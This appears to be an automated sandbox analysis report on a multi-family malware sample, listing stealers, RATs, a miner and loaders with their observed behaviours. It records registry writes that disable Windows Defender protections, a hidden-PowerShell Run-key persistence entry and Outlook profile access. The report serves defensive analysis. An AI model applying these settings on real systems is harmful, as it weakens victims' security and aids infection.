Malware Analysis Report

2025-06-16 01:29

Sample ID 231031-d3hc5sgd2x
Target f7a0efbe97f4cea30f374bb740099b33.bin
SHA256 3aeb57217fd4b1f2c686a779e48cc5f769d55b0f7677818155c2f131ef04af81
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Analysis Overview

Threat Level: Known bad

The file f7a0efbe97f4cea30f374bb740099b33.bin was found to be: Known bad.

Malicious Activity Summary

SectopRAT payload

RedLine

xmrig

Detect ZGRat V1

Suspicious use of NtCreateUserProcessOtherParentProcess

DcRat

Glupteba payload

RedLine payload

SectopRAT

SmokeLoader

Modifies Windows Defender Real-time Protection settings

Glupteba

Amadey

ZGRat

Raccoon

Raccoon Stealer payload

XMRig Miner payload

Modifies Windows Firewall

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Windows security modification

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

UPX packed file

Adds Run key to start application

Checks installed software on the system

Accesses Microsoft Outlook profiles

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

outlook_win_path

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:31

Reported

2023-10-31 03:34

Platform

win7-20231023-en

Max time kernel

119s

Max time network

123s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-31 03:31

Reported

2023-10-31 03:34

Platform

win10v2004-20231023-en

Max time kernel

142s

Max time network

153s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2023-10-31 03:31

Reported

2023-10-31 03:34

Platform

win10v2004-20231020-en

Max time kernel

81s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4894.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\13A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\14CC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\176E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1B68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2348.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4894.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4B74.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\670B.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7FE5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\4B74.exe'\"" C:\Users\Admin\AppData\Local\Temp\4B74.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\13A2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\is-MVMLB.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-R7QLO.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-U56V4.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-BO41E.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-G1IHK.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-QU738.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-JBN5H.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-1IV0A.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-C25U4.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-SH1L9.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-5STTU.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-6Q3GM.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-N9T6Q.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-TN9JA.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-NN5FA.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
